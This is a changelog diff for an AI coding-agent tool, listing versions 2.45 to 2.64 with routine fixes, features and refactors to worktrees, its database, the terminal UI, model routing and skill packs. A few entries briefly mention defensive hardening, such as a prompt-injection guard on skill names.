+- **gsd**: wrap long notification messages and fit overlay to content
+- **gsd**: remove background color from backdrop, fix message truncation
+- **gsd**: restore consistent overlay height to prevent ghost artifacts
+- **gsd**: improve notification overlay backdrop and content-fit sizing
+- **gsd**: only unlink notification lock when owned, prevent foreign lock deletion
+- **gsd**: add backdrop dimming and viewport padding to notification overlay
+- **gsd**: add intent + phase guards to resume context fallback (#3615)
+- **gsd**: inject task context for unstructured resume prompts (#3615)
+- **pi-coding-agent**: restore extension tools after session switch (#3616)
+- **agent-loop**: schema overload cap ignores bash execution errors (#3618)
+- **bg-shell**: prevent signal handler accumulation + cap alert queue
+- **gsd**: coerce plain-string provides field to array in complete-slice (#3585)
+- address PR #3468 review findings
+- **gsd**: persist autoStartTime across session resume so elapsed timer survives /exit
+- **gsd**: add enhanced_verification preferences to mergePreferences
+- **headless**: treat discuss and plan as multi-turn commands
+
+### Changed
+- **interactive**: cap rendered chat components + kill orphan descendants
+- **tui**: render-skip, frame isolation, Text cache guard, dispose
+
+## [2.64.0] - 2026-04-06
+
+### Added
+- **gsd**: add LLM safety harness for auto-mode damage control
+- **ollama**: native /api/chat provider with full option exposure
+- **parallel**: slice-level parallelism with dependency-aware dispatch (#3315)
+- **mcp-client**: add OAuth auth provider for HTTP transport (#3295)
+
+### Fixed
+- **ui**: remove 200-column cap on welcome screen width
+- address adversarial review findings for #3576
+- **gsd**: replace hardcoded agent skill paths with dynamic resolution (#3575)
+- **headless**: sync resources and use agent dir for query
+- **cli**: show latest version and bypass npm cache in update check
+- **gsd**: follow CONTRIBUTING standards for #3565
+- **gsd**: address Codex adversarial review findings for #3565
+- **gsd**: coerce string arrays to objects in complete-slice/task tools (#3565)
+- **gsd**: harden flat-rate routing guard against alias/resolution gaps
+- **pi-coding-agent**: register models.json providers and await Ollama probe in headless mode
+- **ollama**: use apiKey auth mode to avoid streamSimple crash
+- **gsd**: disable dynamic model routing for flat-rate providers
+- **gsd**: address Codex adversarial review findings
+- **gsd**: prevent LLM from querying gsd.db directly via bash (#3541)
+- **gsd**: seed requirements table from REQUIREMENTS.md on first update
+- **gsd**: inject S##-CONTEXT.md from slice discussion into all prompt builders
+- **cli**: guard model re-apply against session restore and async rejection
+- **pi-coding-agent**: resolve model fallback race that ignores configured provider (#3534)
+- **detection**: add xcodegen and Xcode bundle support to project detection (#1882)
+- **perf**: share jiti module cache across extension loads (#3308)
+- **resource-sync**: prune removed bundled subdirectory extensions on upgrade (#1972)
+- recognize U+2705 checkmark emoji as completion marker in prose roadmaps (#1897)
+- **web**: use safePackageRootFromImportUrl for cross-platform package root (#1881) (#1893)
+- isolate CmuxClient stdio to prevent TUI hangs in CMUX (#3306)
+- worktree health check walks parent dirs for monorepo support (#3313)
+- **gsd**: promote milestone status from queued to active in plan-milestone (#3317)
+- **worktree**: correct merge failure notification command from /complete-milestone to /gsd dispatch complete-milestone (#1901)
+- detect and block Gemini CLI OAuth tokens used as API keys (#3296)
+- **auto**: break retry loop on tool invocation errors (malformed JSON) (#3298)
+- **git**: use git add -u in symlink .gsd fallback to prevent hang (#3299)
+- handle complete-slice context exhaustion to unblock downstream slices (#3300)
+- cap consecutive tool validation failures to prevent stuck-loop (#3301)
+- make enrichment tool params optional for limited-toolcall models (#3302)
+- add filesystem safety guard to complete-slice.md (#3304)
+- **extensions**: use bundledExtensionKeys for conflict detection instead of broken path heuristic (#3305)
+- scope tools during discuss flows to prevent grammar overflow (#3307)
+- **preferences**: warn on silent parse failure for non-frontmatter files (#3310)
+- track remote-questions in managed-resources manifest (#3312)
+- **auto**: add timeout guard for postUnitPostVerification in runFinalize (#3314)
+- **gsd**: handle large markdown parameters in complete-milestone JSON parsing (#3316)
+- **metrics**: deduplicate idle-watchdog entries and fix forensics false-positives (#1973)
+- prevent milestone/slice artifact rendering corruption (#3293)
+- **doctor**: strip --fix flag before positional parse (#1919) (#1926)
+- resolve external-state worktree DB path (#2952) (#3303)
+- **gsd**: worktree teardown path validation prevents data loss (#3311)
+- prevent auto-mode from dispatching deferred slices (#3309)
+- preserve completed slice status on plan-milestone re-plan (#3318)
+- reopen DB on cold resume, recognize heavy check mark (#3319)
+- dashboard model label shows dispatched model, not stale previous unit (#3320)
+
+### Changed
+- **gsd**: remove copyright line from test file
+- **gsd**: trim promptGuidelines to 1 line to reduce per-turn token cost
+- **web**: consolidate subprocess boilerplate into shared runner (#1899)
+
+## [2.63.0] - 2026-04-05
+
+### Added
+- **mcp-server**: add 6 read-only tools for project state queries (#3515)
+
+### Fixed
+- **gsd**: enrich vague diagnostic messages with root-cause context
+- **test**: reset dedup cache between ask-user-freetext tests
+- **db**: delete orphaned WAL/SHM files alongside empty gsd.db (#2478)
+- **gsd**: prevent auto-wrapup from interrupting in-flight tool calls (#3512)
+- **gsd**: handle bare model IDs in resolveDefaultSessionModel (#3517)
+- **gsd**: wrap decision and requirement saves in transaction to prevent ID races
+- **gsd**: prefer PREFERENCES.md over settings.json for session bootstrap model (#3517)
+- **gsd**: add Claude Code official skill directories to skill resolution
+- **dedup**: hash full question payload, not just IDs
+- **gsd**: prevent duplicate ask_user_questions dispatches with per-turn dedup cache
+- **pi-ai**: extend repairToolJson to handle XML tags and truncated numbers
+- **pi-coding-agent**: cancel stale retries after model switch
+
+### Changed
+- untrack .repowise/ and add to .gitignore
+
+## [2.62.1] - 2026-04-05
+
+### Fixed
+- **gsd**: gate steer worktree routing on active session, fix messaging
+- **gsd**: resolve steer overrides to worktree path when worktree is active
+
+## [2.62.0] - 2026-04-04
+
+### Added
+- **gsd**: enhance /gsd codebase with preferences, --collapse-threshold, and auto-init
+- **01-05**: fire before_model_select hook, add verbose scoring output, load capability overrides
+- **01-04**: register before_model_select placeholder handler in GSD hooks
+- **01-04**: add BeforeModelSelectEvent to extension API and wire emission
+- **01-03**: wire taskMetadata from selectAndApplyModel to resolveModelForComplexity
+- **01-03**: insert STEP 2 capability scoring into resolveModelForComplexity
+- **01-01**: add taskMetadata to ClassificationResult and export extractTaskMetadata
+- **01-01**: add capability types, data tables, and scoring functions to model-router
+
+### Fixed
+- **gsd**: add codebase validation in validatePreferences so preferences are not silently dropped
+- **test**: update db-path-worktree-symlink test for simplified diagnostic logging
+- **gsd**: update tests for errors-only audit persistence, fix empty catch blocks
+- **gsd**: harden audit log persistence — errors-only, sanitized, demote probe warnings
+- **gsd**: address adversarial review findings on workflow-logger migration
+- **gsd**: fail-closed stop guard, harden backtrack parsing, fix prompt params
+- **gsd**: add diagnostic logging to empty catch blocks in auto-mode
+- **lsp**: add legacy alias for renamed kotlin-language-server key
+- break infinite notes loop when selecting "None of the above"
+- align defaultRoutingConfig capability_routing to true
+- **pi-coding-agent**: upgrade Kotlin LSP to official Kotlin/kotlin-lsp
+- **test**: use correct RequirementCounts type fields in edge case tests
+- **remote-questions**: fire configured channels in interactive mode
+
+### Changed
+- **gsd**: migrate all catch blocks to centralized workflow-logger
+- init gsd
+
+## [2.61.0] - 2026-04-04
+
+### Added
+- stop/backtrack capture classifications for milestone regression (#3488)
+- GSD context optimization with model routing and context masking
+
+## [2.60.0] - 2026-04-04
+
+### Added
+- add /btw skill — ephemeral side questions from conversation context
+
+### Fixed
+- **btw**: remove LLM-specific references from skill description
+
+## [2.59.0] - 2026-04-03
+
+### Added
+- **extensions**: add Ollama extension for first-class local LLM support (#3371)
+- **doctor**: stale commit safety check with gsd snapshot and auto-cleanup
+- **extensions**: wire up topological sort and unified registry filtering (#3152)
+- **widget**: add last commit display and dashboard layout improvements (#3226)
+- **model-routing**: enable dynamic routing by default (#3120)
+- **vscode**: sidebar redesign, SCM provider, checkpoints, diagnostics [3/3]
+- **splash**: add remote channel indicator to welcome screen tools row
+- stream full text and thinking output in headless verbose mode (#2934)
+- **gsd**: add codebase map — structural orientation for fresh agent contexts
+
+### Fixed
+- **worktree**: resolve merge conflict for PR #3322 — adopt comprehensive pre-merge cleanup
+- **merge**: clean stale MERGE_HEAD before squash merge (#2912)
+- **state**: always run disk→DB reconciliation when DB is available (#2631)
+- **git-service**: fix merge-base ancestry check and .gsd/ leakage in snapshot absorption
+- **extensions**: update provides.hooks in 7 extension manifests to match actual registrations (#3157)
+- surface nativeCommit errors in reconcileMergeState instead of silently swallowing (#3052)
+- **parallel**: scope commits to milestone boundaries in parallel mode (#3047)
+- add windowsHide to all web-mode subprocess spawns (#2628) (#3046)
+- skip auto-mode pause on empty-content aborted messages (#2695) (#3045)
+- detect and remove nested .git dirs in worktree cleanup to prevent data loss (#3044)
+- prevent data loss when git isolation default changes (#2625) (#3043)
+- **read-tool**: clamp offset to file bounds instead of throwing (#3007) (#3042)
+- **gsd**: preserve queued milestones with worktrees in ghost detection (#3041)
+- **compaction**: add chunked fallback when messages exceed model context window (#3038)
+- preserve interactive terminal across tab switches and project changes (#3055)
+- call cleanupQuickBranch on turn_end to squash-merge quick branch back (#3054)
+- align run-uat artifact path to ASSESSMENT, preventing false stuck retries (#3053)
+- replace invalid Discord invite links with canonical URL (#3056)
+- add Windows shell guard to remaining spawn sites (#3058)
+- route `gsd auto` to headless runner to prevent hang on piped stdin/stdout (#3057)
+- respect .gitignore for .gsd/ in rethink prompt (#3059)
+- migrate unit ownership from JSON to SQLite to eliminate read-modify-write race (#3061)
+- **roadmap**: handle numbered, bracketed, and indented prose H3 headers in slice parser (#3063)
+- add worktree-merge to resolveModelWithFallbacksForUnit switch and update KNOWN_UNIT_TYPES (#3066)
+- clean up MERGE_HEAD on all error paths in mergeMilestoneToMain (#2912) (#3068)
+- prevent LLM from confusing background task output with user input (#3069)
+- add openai-codex provider and modern OpenAI models to MODEL_CAPABILITY_TIER and cost tables (#3070)
+- preserve active tab when switching projects (#3071)
+- include project name in desktop notifications (#3072)
+- recover from many-image dimension overflow by stripping older images (#3075)
+- resolve bare model IDs to anthropic over claude-code provider (#3076)
+- **auto**: move selectAndApplyModel before updateProgressWidget (#3079)
+- detect project relocation and recover state without data loss (#3080)
+- add free-text input to ask-user-questions when "None of the above" is selected (#3081)
+- block work execution during /gsd queue mode (#2545) (#3082)
+- detect worktree basePath in gsdRoot() to prevent escaping to project root (#3083)
+- invalidate stale quick-task captures across milestone boundaries (#3084)
+- defer model validation until after extensions register (#3089)
+- repair YAML bullet lists in malformed tool-call JSON (#3090)
+- unify SUMMARY.md render paths for projection fidelity (#3091)
+- chat mode misrepresents terminal output, looks stuck, omits user messages (#3092)
+- resolve 4 state corruption bugs in milestone/slice completion (#2945) (#3093)
+- isolate guided-flow session state and key discussion milestone queries (#2985) (#3094)
+- **guided-flow**: route dispatchWorkflow through dynamic routing pipeline (#3153)
+- skip external state migration inside git worktrees (#2970) (#3227)
+- coerce non-numeric strings in DB columns during manifest serialization (#2962) (#3229)
+- route allDiscussed and zero-slices paths to queued milestone discussion (#3150) (#3230)
+- use loose equality for null checks in secure_env_collect (#2997) (#3231)
+- prevent prompt explosion from $' in template replacement values (#2968) (#3232)
+- resolve OAuth API key in buildMemoryLLMCall via modelRegistry (#2959) (#3233)
+- **forensics**: read completion status from DB instead of legacy file (#3129) (#3234)
+- use camelCase parameter names in execute-task and complete-slice prompts (#2933) (#3236)
+- check bootstrap completeness in init wizard gate, not just .gsd/ existence (#2942) (#3237)
+- specify write tool for PROJECT.md in milestone/slice prompts (#3238)
+- widen completing-milestone gate to accept "None required" and similar phrasings (#2931) (#3239)
+- prevent ask_user_questions from poisoning auto-mode dispatch (#2936) (#3240)
+- guard null s.currentUnit in runUnitPhase closeout after stopAuto race (#2939) (#3241)
+- replace `web_search` with `search-the-web` in prompts and agent frontmatter (#2920) (#3245)
+- preserve milestone title in upsertMilestonePlanning when DB row pre-exists (#2879) (#3247)
+- invalidate stale milestone validation on roadmap reassessment (#2957) (#3242)
+- **discuss**: add roadmap fallback when DB is open but empty (#2892) (#3244)
+- integrate Codex & Gemini CLI into provider routes and rate-limit handling (#2922) (#3246)
+- **error-classifier**: widen STREAM_RE to cover all 7 V8 JSON parse error variants (#2916) (#3243)
+- prevent git stash from destroying queued milestone CONTEXT files (#2505) (#3273)
+- skip staleness rebuild in npm tarball installs (#2877) (#3250)
+- **parallel**: check worktree DB for milestone completion in merge (#2812) (#3256)
+- make claude-code provider stateful with full context and sidechain events (#2859) (#3254)
+- **worktree**: preserve non-empty gsd.db during sync to prevent truncation (#2815) (#3255)
+- align @gsd/native module type with compiled output (#3253)
+- parse hook/* completed-unit keys correctly in forensics + doctor (#2826) (#3252)
+- copy mcp.json into auto-mode worktrees (#2791) (#3251)
+- add gsd_requirement_save and upsert path for requirement updates (#3249)
+- handle pause_turn stop reason to prevent 400 errors with native web search (#2869) (#3248)
+- use authoritative milestone status in web roadmap (#2807) (#3258)
+- classify long-context entitlement 429 as quota_exhausted, not rate_limit (#2803) (#3257)
+- **docs**: use ~/.pi/agent/extensions/ for community extension install path (#3131) (#3259)
+- add disk→DB slice reconciliation in deriveStateFromDb (#2533) (#3262)
+- run forensics duplicate detection before investigation (#2704) (#3260)
+- skip TUI render loop on non-TTY stdout to prevent CPU burn (#3095) (#3263)
+- persist forensics report context across follow-up turns (#2941) (#3261)
+- invalidate workspace state on turn_end so milestones list stays current (#2706) (#3266)
+- eliminate 3 recurring doctor audit false positives (#3105) (#3264)
+- **web**: reconcile auto-mode state with on-disk lock in dashboard (#2705) (#3265)
+- treat ghost milestones as ineligible for parallel execution (#2501) (#3268)
+- redirect auto-mode to headless when stdout is piped (#2732) (#3269)
+- attempt VACUUM recovery when initSchema fails with corrupt freelist (#2519) (#3270)
+- resolve db_unavailable loop in worktree/symlink layouts (#2517) (#3271)
+- correct OAuth fallback request shape for google_search (#2963) (#3272)
+- prevent UAT stuck-loop and orphaned worktree after milestone completion (#3065)
+- **mcp**: handle server names with spaces in mcp_discover (#3037)
+- **gsd**: detect markdown body verdicts and guard plan-milestone against completed slices (#2960) (#3035)
+- **error-classifier**: replace STREAM_RE whack-a-mole with catch-all V8 JSON.parse pattern
+- type _borderColorKey as 'dim' | 'bashMode' to match ThemeColor
+- **tui**: comprehensive TUI review — layout, flow, rendering, and state fixes
+- **gsd**: harden codebase-map — bug fixes, UX polish, and expanded tests
+
+### Changed
+- **state**: centralize pipeline logging through workflow logger (#3282)
+- **gitignore**: exclude src/ build artifacts, scratch files, and .plans/
+- **complexity**: reclassify planning phases from standard to heavy tier
+
+## [2.58.0] - 2026-03-28
+
+### Added
+- Added 6 discord.js shard/error/warn event listeners for reconnect…
+
+### Fixed
+- **auto**: guard startAuto() against concurrent invocation (#2923)
+- **auto-dispatch**: widen operational verification gate regex (fixes #2866) (#2898)
+- **parallel**: three bugs preventing reliable parallel worker execution (#2801)
+- **web**: fall back to project totals when dashboard metrics are zero (#2847)
+- **gsd**: parse raw YAML under preference headings (#2794)
+- **gsd**: persist verification classes in milestone validation (#2820)
+- **gsd**: guard reconcileWorktreeDb against same-file ATTACH corruption (#2825)
+- **web**: skip shutdown in daemon mode so server survives tab close (#2842)
+- **headless**: skip execution_complete for multi-turn commands (auto/next)
+- Fixed 3 bugs (launchd JSON parsing, login race condition, interact…
+
+## [2.57.0] - 2026-03-28
+
+### Added
+- Extended DaemonConfig with control_channel_id and orchestrator se…
+- Created pure-function event formatters (10 functions) mapping RPC…
+- **models**: add GLM-5.1 to Z.AI provider in custom models
+- Added discord.js v14, DiscordBot class with auth guard and lifecy…
+- Created packages/daemon workspace package with DaemonConfig/LogLe…
+- headless text mode shows tool calls + skip UAT pause in headless
+- Wire --resume flag to resolve session IDs via prefix matching and…
+- Migrated headless orchestrator to use execution_complete events,…
+
+### Fixed
+- **headless**: match "completed" status from RPC v2 in exit code mapper
+- show external drives in directory browser on Linux
+- Regenerate package-lock.json after merge
+- **gsd**: resume cold auto bootstrap from db
+- **gsd**: preserve first auto unit model after session reset
+- Accept flags after positional command in headless arg parser
+- **gsd**: discover project subagents in .gsd
+- **model-routing**: use honest unitTypes for discuss dispatches and map all auto-dispatch phases
+- revert jsonl.ts to inline implementation — @gsd-build/rpc-client not available at source-level test time in CI
+
+### Changed
+- auto-commit after complete-milestone
+
+## [2.56.0] - 2026-03-27
+
+### Added
+- **parallel**: /gsd parallel watch — native TUI overlay for worker monitoring (#2806)
+
+### Fixed
+- **ci**: copy web/components to dist-test for xterm-theme test (#2891)
+- **gsd**: prefer PREFERENCES.md in worktrees (#2796)
+- **gsd**: resume auto-mode after transient provider pause (#2822)
+- **parallel**: resolve session lock contention and 3 related parallel-mode bugs (#2184) (#2800)
+- **web**: improve light theme terminal contrast (#2819)
+- **gsd**: preserve auto start model through discuss (#2837)
+
+### Changed
+- **test**: compile unit tests with esbuild, reclassify integration tests, fix node_modules symlink (#2809)
+
+## [2.55.0] - 2026-03-27
+
+### Added
+- colorized headless verbose output with thinking, phases, cost, and durations (#2886)
+- headless text mode observability + skip UAT pause (#2867)
+
+### Fixed
+- **cli**: let gsd update bypass version mismatch gate (#2845)
+- **contracts**: add isWorkspaceEvent guard + close routeLiveInteractionEvent exhaustiveness gap (#2878)
+- **gsd**: use project root for prior-slice dispatch guard (#2863)
+- **gsd**: include queue context in milestone planning prompts (#2846)
+- detect monorepo roots in project discovery to prevent workspace fragmentation (#2849)
+- **bg-shell**: recover from deleted cwd in timers (#2850)
+- **gsd**: enable dynamic routing without models section (#2851)
+- **interactive**: fully remove providers from /providers (#2852)
+
+## [2.54.0] - 2026-03-27
+
+### Added
+- Headless Integration Hardening & Release (M002) (#2811)
+- **parallel**: add real-time TUI monitor dashboard with self-healing (#2799)
+
+## [2.53.0] - 2026-03-27
+
+### Added
+- **vscode**: activity feed, workflow controls, session forking, enhanced code lens [2/3] (#2656)
+- **gsd**: enable safety mechanisms by default (snapshots, pre-merge checks) (#2678)
+
+### Fixed
+- hydrate collected secrets for current session (#2788)
+- resolve stash pop conflicts and stop swallowing merge errors (#2780)
+- treat any extracted verdict as terminal in isValidationTerminal (#2774)
+- use localStorage for auth token to enable multi-tab usage (#2785)
+- guard activeMilestone.id access in discuss and headless paths (#2776)
+- clean up zombie parallel workers stuck in error state (#2782)
+- relax milestone validation gate to accept prose evidence (#2779)
+- write milestone reports to project root instead of worktree (#2778)
+- auto-resolve build artifact conflicts in milestone merge (#2777)
+- let rate-limit errors attempt model fallback before pausing (#2775)
+- prevent gsd next from self-killing via stale crash lock (#2784)
+- add shell flag for Windows spawn in VSCode extension (#2781)
+
+### Changed
+- **gsd**: extract duplicated status guards and validation helpers (#2767)
+
+## [2.52.0] - 2026-03-27
+
+### Added
+- **vscode**: status bar, file decorations, bash terminal, session tree, conversation history, code lens [1/2] (#2651)
+- **web**: Dark mode contrast — raise token floor and flatten opacity tier system (#2734)
+- Wire --bare mode across headless → pi-coding-agent → resource-loa…
+- Added runId generation on prompt/steer/follow_up commands, event…
+- Added RPC protocol v2 types, init handshake with version detectio…
+
+### Fixed
+- auto-mode stops after provider errors (#2762) (#2764)
+- add missing runtime stage name to Dockerfile (#2765)
+- make transaction() re-entrant and add slice_dependencies to initSchema
+- remove preferences.md from ROOT_STATE_FILES to prevent back-sync overwrite
+- wire tool handlers through DB port layer, remove _getAdapter from all tools
+- **gsd**: move state machine guards inside transaction in 5 tool handlers (#2752)
+- reconcile disk milestones into empty DB before deriveStateFromDb guard (#2686)
+- **gsd**: seed preferences.md into auto-mode worktrees (#2693)
+- **claude-import**: discover marketplace plugins nested inside container directories (#2718)
+- exempt interactive tools from idle watchdog stall detection (#2676)
+- guard allSlicesDone against vacuous truth on empty slice array (#2679)
+- block complete-milestone dispatch when VALIDATION is needs-remediation (#2682)
+- **gsd**: sync milestone DB status in parkMilestone and unparkMilestone (#2696)
+- **web**: auth token gate — synthetic 401 on missing token, unauthenticated boot state, and recovery screen (#2740)
+- **remote-questions**: empty-key entry in auth.json shadows valid Discord bot token (#2737)
+- idle watchdog stalled-tool detection overridden by filesystem activity (#2697)
+- surface exhausted Claude SDK streams as errors (#2719)
+- **docker**: overhaul fragile setup, adopt proven container patterns (#2716)
+- **gsd**: write DB before disk in validate-milestone to match engine pattern (#2742)
+- **gsd**: extract and honor milestone argument in /gsd auto and /gsd next (#2729)
+- **windows**: prevent EINVAL by disabling detached process groups on Win32 (#2744)
+- **gsd**: delete orphaned verification_evidence rows on complete-task rollback (#2746)
+- **gsd**: wire setLogBasePath into engine init to resurrect audit log (#2745)
+- Remove premature pendingTools.delete in webSearchResult handler (#2743)
+- **gsd**: remove redundant assertions that fail TS2367 typecheck
+- include preferences.md in worktree sync and initial seed
+
+### Changed
+- **pi-ai**: replace model-ID pattern matching with capability metadata (#2548)
+- **gsd-db**: comprehensive SQLite audit fixes — indexes, caching, safety, reconciliation
+- rename preferences.md to PREFERENCES.md for consistency (#2700) (#2738)
+- **gsd**: unify three overlapping error classifiers into single classify→decide→act pipeline
+
+## [2.51.0] - 2026-03-26
+
+### Added
+- add /terminal slash command for direct shell execution (#2349)
+- **auto**: check verification class compliance before milestone completion (#2623)
+- **validate**: extract followUps and knownLimitations in parseSummary (#2622)
+- managed RTK integration with opt-in preference and web UI toggle (#2620)
+- **validate**: inject verification classes into milestone validation prompt (#2621)
+- **skills**: add 19 wshobson/agents packs with 40 curated skills
+- **skills**: add 11 new skill packs covering major frameworks and languages
+- **skills**: add SQLite/SQL detection, SQL optimization pack, and Redis pack
+- **skills**: add Prisma and Supabase/Postgres database packs
+- **skills**: add cloud platform packs (Firebase, Azure, AWS) and improve detection
+- **skills**: curate catalog — add top ecosystem skills, drop low-quality bundled ones
+- **skills**: parse SDKROOT from pbxproj for platform-aware iOS skill matching
+- **skills**: use ~/.agents/skills/ as primary skills directory with curated catalog
+
+### Fixed
+- improve light theme warning contrast (#2674)
+- honor explicit model config when model is not in known tier map (#2643)
+- exclude lastReasoning from retry diagnostic to prevent hallucination loops (#2663)
+- persist rewrite-docs attempt counter to disk for session restart survival (#2671)
+- add non-null assertions for parseUnitId optional fields in tests
+- update triage-dispatch static analysis tests for enqueueSidecar helper
+- **notifications**: prefer terminal-notifier over osascript on macOS (#2633)
+- classify stream-truncation JSON parse errors as transient (#2636)
+- call ensureDbOpen() before slice queries in /gsd discuss (#2640)
+- **prompts**: use --body-file for forensics issue creation (#2641)
+- isLockProcessAlive should return true for own PID (#2642)
+- check ASSESSMENT file for UAT verdict in checkNeedsRunUat (#2646)
+- use pauseAuto instead of stopAuto for warning-level dispatch stops (#2666)
+- signal malformed tool arguments in toolcall_end event (#2647)
+- prevent double mergeAndExit on milestone completion (#2648)
+- respect queue-order.json in DB-backed state derivation (#2649)
+- **vscode**: support Remote SSH by adding extensionKind and error handler (#2650)
+- update DB task status in writeBlockerPlaceholder for execute-task (#2657)
+- normalize path separators in matchesProjectFileMarker for Windows
+- **tests**: remove obsolete doctor filesystem test
+- **tests**: update doctor issue code to db_done_task_no_summary
+- restore PR files lost during merge conflict resolution
+- **skills**: address QA round 3
+- **skills**: address QA round 2
+- **skills**: address QA round 1
+- **skills**: prioritize ecosystem dir and skip legacy after migration
+- **skills**: address QA round 23
+- **skills**: address QA round 22
+- **skills**: address QA round 21
+- **skills**: address QA round 20
+- **skills**: address QA round 19
+- **skills**: address QA round 18
+- **skills**: address QA round 17
+- **skills**: address QA round 16
+- **skills**: address QA round 15
+- **skills**: address QA round 14
+- **skills**: address QA round 13
+- **skills**: address QA round 12
+- **skills**: address QA round 11
+- **skills**: address QA round 10
+- **skills**: address QA round 8
+- **skills**: detect FastAPI via dependency scanning
+- **skills**: address QA round 6
+- **skills**: address QA round 5
+- **skills**: address QA round 4
+- **skills**: address QA round 3
+- **skills**: address QA round 2
+- **skills**: defer greenfield skill selection to post-design phase
+- **skills**: add migration from ~/.gsd/agent/skills/ to ~/.agents/skills/
+- **gsd extension**: detect initialized projects in health widget
+- **gsd extension**: detect initialized projects in health widget
+
+### Changed
+- consolidate docs, remove stale artifacts, and repo hygiene (#2665)
+- extract runSafely helper for try-catch-debug-continue pattern (#2611)
+
+## [2.50.0] - 2026-03-26
+
+### Added
+- **gsd**: wire structured error propagation through UnitResult
+- add parallel quality gate evaluation with evaluating-gates phase
+- add 8-question quality gates to planning and completion templates
+
+### Fixed
+- reconcile stale task status in filesystem-based state derivation (#2514)
+- merge duplicate extractUatType imports in auto-dispatch
+- use Record<string, any> for hasNonEmptyFields to accept typed DB rows
+- **tests**: replace undefined assertTrue/assertEq with assert.ok/assert.equal
+- **tests**: replace undefined assertTrue/assertEq with assert.ok/deepStrictEqual
+- **gsd**: handle session_switch event so /resume restores GSD state (#2587)
+- use GitHub Issue Types via GraphQL instead of classification labels
+- **headless**: disable overall timeout for auto-mode, fix lock-guard auto-select (#2586)
+- **auto**: align UAT artifact suffix with gsd_slice_complete output (#2592)
+- **retry-handler**: stop treating 5xx server errors as credential-level failures
+- **test**: replace stale completedUnits with sessionFile in session-lock test
+- **session-lock**: retry lock file reads before declaring compromise
+- **gsd**: prevent ensureGsdSymlink from creating subdirectory .gsd when git-root .gsd exists
+- **auto**: add EAGAIN to INFRA_ERROR_CODES to stop budget-burning retries
+- **search**: enforce hard search budget and survive context compaction
+- **remote-questions**: use static ESM import for AuthStorage hydration
+- add SAFE_SKILL_NAME guard to reject prompt-injection via crafted skill names
+- **gsd**: use explicit parameter syntax in skill activation prompts
+- guard writeIntegrationBranch against workflow-template branches
+- preserve doctor missing-dir checks for active legacy slices
+- **gsd**: downgrade isolation mode when worktree creation fails
+- **gsd**: skip loading files for completed milestones in queue context builder
+- resolve race conditions in blob-store, discovery-cache, and agent-loop
+- **ai**: resolve WebSocket listener leaks and bound session cache
+- **rpc**: resolve double-set race, missing error ID, and stream handler
+- **pi-coding-agent**: prevent crash when login is cancelled
+- **doctor**: compare lockfile mtime against install marker, not directory mtime (#1974)
+- **doctor**: chdir out of orphaned worktree before removal (#1946)
+- **roadmap**: recognize '## Slice Roadmap' header in extractSlicesSection
+- prevent worktree sync from overwriting state and forward-sync completed-units.json
+- **web**: lazily compute default package root to avoid Windows standalone crash
+
+### Changed
+- adopt parseUnitId utility across all auto-* modules
+- flatten syncMilestoneDir nesting with shared helper
+- extract merge-state cleanup helper in reconcileMergeState
+- extract planning-state validation helpers in detectRogueFileWrites
+- split doctor-checks into focused modules
+- merge auto-worktree-sync into auto-worktree
+- deduplicate artifact path functions into single module
+- remove dead selfHealRuntimeRecords function from auto-recovery
+- decouple session-forensics from auto-worktree
+- remove dead worktree code and unused methods
+- consolidate branch name patterns into single module
+- deduplicate session-lock compromise handler and state assignment
+
+## [2.49.0] - 2026-03-25
+
+### Added
+- add --yolo flag to /gsd auto for non-interactive project init
+
+### Fixed
+- use full git log in merge tests to match trailer-based milestone IDs
+- update parallel-merge test assertion for new trailer format
+- clarify regex alternation in test assertion
+- verdict gate accepts PARTIAL for mixed/human-experience/live-runtime UATs
+
+### Changed
+- move GSD metadata from commit subject scopes to git trailers
+
+## [2.48.0] - 2026-03-25
+
+### Added
+- **discuss**: allow /gsd discuss to target queued milestones
+- enhance /gsd forensics with journal and activity log awareness
+
+### Fixed
+- make journal scanning intelligent — limit parsed files, line-count older ones
+- **model-registry**: scope custom provider stream handlers to prevent clobbering built-in API handlers
+- **forensics**: filter benign bash exit-code-1 and user skips from error traces
+- **gsd**: clear stale milestone ID reservations at session start
+- render tool calls above text response for external providers
+- **auto**: skip CONTEXT-DRAFT warning for completed/parked milestones
+
+### Changed
+- address review - extract RAPID_ITERATION_THRESHOLD_MS, simplify data access
+
+### Removed
+- remove insertChildBefore usage in chat-controller
+
+## [2.47.0] - 2026-03-25
+
+### Added
+- **agent-core**: add externalToolExecution mode for external providers
+- **provider**: add Claude Code CLI provider extension
+
+### Fixed
+- **claude-code-cli**: render tool calls above text response
+- **ci**: update FILE-SYSTEM-MAP.md path after docs→docs-internal move
+- isInheritedRepo false negative when parent has stale .gsd; defense-in-depth local .git check in bootstrap
+- **claude-code-cli**: resolve SDK executable path and update model IDs
+- make planning doctrine demoable definition audience-appropriate
+- **prompts**: migrate remaining 4 prompts to use DB-backed tool API instead of direct write
+- make workflow event hash platform-deterministic
+- reconcile stale task DB status from disk artifacts (#2514)
+
+## [2.46.1] - 2026-03-25
+
+### Fixed
+- **ci**: prevent windows-portability from blocking pipeline
+- **ci**: prevent pipeline race condition on release push
+- **gsd**: create empty DB for fresh projects with empty .gsd/ (#2510)
+- **remote-questions**: hydrate remote channel tokens from auth.json on startup
+
+### Changed
+- trigger CI to pick up pipeline race condition fix
+- trigger pipeline with race condition fix
+
+## [2.46.0] - 2026-03-25
+
+### Added
+- **gsd**: single-writer engine v3 — state machine guards, actor identity, reversibility
+- **gsd**: single-writer state engine v2 — discipline layer on DB architecture
+- **gsd**: add workflow-logger and wire into engine, tool, manifest, reconcile paths (#2494)
+
+### Fixed
+- **gsd**: align prompts with single-writer tool API
+- **gsd**: integration-proof — check DB state not roadmap projection after reset
+- **gsd**: block milestone completion when verification fails (#2500)
+- **ci**: add typecheck:extensions to pretest to prevent silent type drift
+- **gsd**: relax integration-proof cross-validation for table-format roadmap
+- **gsd**: update integration-proof tests for table-format roadmap projections
+- **gsd**: update test assertions for schema v11, prompt changes, and removed completedUnits
+- **gsd**: update test files for removed completedUnits, writeLock signature, and type changes
+- **gsd**: remove stale completedUnits refs, fix writeLock callers, add missing imports
+- **gsd**: harden single-writer engine — close TOCTOU, intercept bypasses, status inconsistencies
+- **write-intercept**: close bare-relative-path bypass in STATE.md regex
+- **voice**: fix misleading portaudio error on PEP 668 Linux systems (#2403) (#2407)
+- **core**: address PR review feedback for non-apikey provider support (#2452)
+- **ci**: retry npm install in pipeline to handle registry propagation delay (#2462)
+- **gsd**: change default isolation mode from worktree to none (#2481)
+- **loader**: add startup checks for Node version and git availability (#2463)
+- **gsd**: add worktree lifecycle events to journal (#2486)
+
+## [2.45.0] - 2026-03-25
+
+### Added
